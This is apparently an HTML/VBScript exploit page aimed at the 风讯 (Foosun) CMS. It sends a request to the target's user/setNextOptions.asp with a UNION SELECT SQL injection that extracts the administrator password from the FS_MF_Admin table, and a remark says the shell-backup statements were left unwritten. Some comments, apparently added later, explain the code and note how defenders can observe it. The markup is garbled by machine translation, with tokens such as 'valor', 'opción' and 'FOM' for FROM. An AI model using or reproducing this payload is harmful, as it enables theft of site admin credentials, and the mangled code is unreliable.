<ScriptLanguage = "vBscript">
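' Load handler for the page: sets the window size and position.
' The listing as extracted has fused and machine-translated tokens
' ("Subwindow_onload", "ventana", "Endsub"); this restores valid VBScript.
Sub window_onload
    ' Width 450, height 380.
    window.resizeTo 450, 380
    ' Screen position of the top-left corner.
    window.moveTo 300, 300
End Sub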
</script>
<ScriptLanguage = "vBscript">
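' Fetches the resource at `ruta`, decodes the response body as GB2312 text,
' shows it in the element with id "url" and returns the decoded text.
'
' ruta: the URL to request. It is passed to GetBody unchanged; nothing in this
'       function validates its scheme, host or query string.
' Returns: the decoded response text.
'
' NOTE(review): no element with id "url" appears in the visible markup
' (only "urlcode" and "SQL"); confirm it exists elsewhere on the page.
Function gethttppage(ruta)
    Dim t
    t = GetBody(ruta)
    gethttppage = BytesToBstr(t, "GB2312")
    ' innerText renders the response as plain text, so markup in the response
    ' is displayed rather than interpreted.
    document.getElementById("url").innerText = gethttppage
End Function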
</script>
<ScriptLanguage = "vBscript">
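' Issues a synchronous HTTP GET for `url` through the Microsoft.XMLHTTP COM
' object and returns the raw response body (a byte array).
'
' url: request target, used exactly as given.
' Returns: .ResponseBody on success. Because of On Error Resume Next, any
'          failure (object creation, network error) is silent and the
'          function result is left Empty.
'
' For defenders: this is a script-created Microsoft.XMLHTTP object making an
' outbound request to a URL built from page input, which is observable in
' script-host / process telemetry and in the target's web-server logs.
Function GetBody(url)
    ' Best-effort: errors are suppressed for the remainder of this function.
    On Error Resume Next
    Dim Retrieval
    Set Retrieval = CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        ' Third argument False = synchronous; empty user name and password.
        .Open "Get", url, False, "", ""
        .Send
        GetBody = .ResponseBody
    End With
    Set Retrieval = Nothing
End Function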
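' Converts a byte array to a string using the named character set, by writing
' the bytes into an ADODB.Stream in binary mode and reading them back as text.
'
' Body: the bytes to decode (as returned by XMLHTTP .ResponseBody).
' CSET: character-set name handed to the stream, e.g. "GB2312".
' Returns: the decoded text, or "" when Body is Empty or Null (which is what
'          a failed request leaves behind when the fetch suppressed its errors).
Function BytesToBstr(Body, CSET)
    Dim objstream
    If IsEmpty(Body) Or IsNull(Body) Then
        BytesToBstr = ""
        Exit Function
    End If
    Set objstream = CreateObject("ADODB.Stream")
    objstream.Type = 1          ' 1 = binary
    objstream.Mode = 3          ' 3 = read/write
    objstream.Open              ' the extracted listing lost this method name
    objstream.Write Body
    ' Rewind before switching type; Type can only change at position 0.
    objstream.Position = 0
    objstream.Type = 2          ' 2 = text
    objstream.Charset = CSET
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function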
</script>
<title> bylcx </title>
<inputid = "urlcode" name = "urlcode" size = "60" valor = "http: // 风讯 url/user/setNextOptions.asp">
<selectID = "SQL" name = "SQL" onChange = VBS: GethttpPage (document.getElementById ("urlcode"). valor+document.getElementById ("sql"). valor)>
<optionValue = ""> 风讯 sql 版注入 , 至于其它备份 shell 的语句懒得写了 </opción>
<optionValue = "? Equvalue = 1 & reqsql = Select%201, Admin_pass_word, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20FOM%20FS_MF_Admin%20Where 20id = 1-")"> 暴管理员密码 </opción>